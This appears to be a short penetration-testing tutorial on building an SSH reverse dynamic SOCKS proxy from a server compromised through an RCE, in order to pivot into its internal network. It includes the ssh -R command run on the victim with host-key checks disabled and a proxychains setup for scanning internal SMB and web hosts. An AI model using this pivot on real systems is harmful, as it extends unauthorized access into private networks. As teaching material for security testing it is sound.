In a SSH reverse dynamic proxy, a remote host connects to a local host over SSH to give the local host access to the remote network with a SOCKS proxy. An SSH reverse proxy can be set up with an RCE on a compromised server in the following manner (Set up = solid lines, Usage = dotted lines):
graph TD
subgraph Pivot
remote_web[Web on 80] -->|RCE|remote_sshclient[SSH Client]
end
subgraph Local
local_ssh[SSH on 22] -->|creates| local_socks[SOCKS Proxy]
nmap[Nmap] -.->|proxychains| local_socks
end
subgraph Target2 [Target 2]
target_web[Web on 80]
end
subgraph Target1 [Target 1]
target_samba[SMB on 445]
end
remote_sshclient -->|proxy setup| local_ssh
local_socks -.-> local_ssh -.-> remote_sshclient -.-> target_web & target_samba
Demonstration
Start the SSH server on the local machine.
Create a SSH key on the remote machine with access to that network and add to the local user’s authorized_keys files with extra options to restrict access to tunnelling/proxy only (replace $REMOTE_IP and the key itself):
from="$REMOTE_IP",command="false",no-agent-forwarding,no-X11-forwarding,no-pty ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC4cjmvS... mysql@zora
Run the command below on the remote machine to start a SOCKS proxy server on the local machine:
ssh -f -N -R $local_port -o "UserKnownHostsFile=/dev/null" -o "StrictHostKeyChecking=no" $local_user@$local_host-f: run in background-N: do not try to start a shell-R $local_port: since it only specifies a local port but not the remote port/address, this option instructs the SSH server to start SOCKS proxy server on$local_port;-Rcan also be used to create an SSH reverse tunnel- The
-ooptions removes user interaction and avoids recording the host key
The proxy server can then be used in places like a browser. It can also be used in proxychains by editing /etc/proxychains4.conf (assuming that local port is 1080):
[ProxyList]
# ...
socks4 127.0.0.1 1080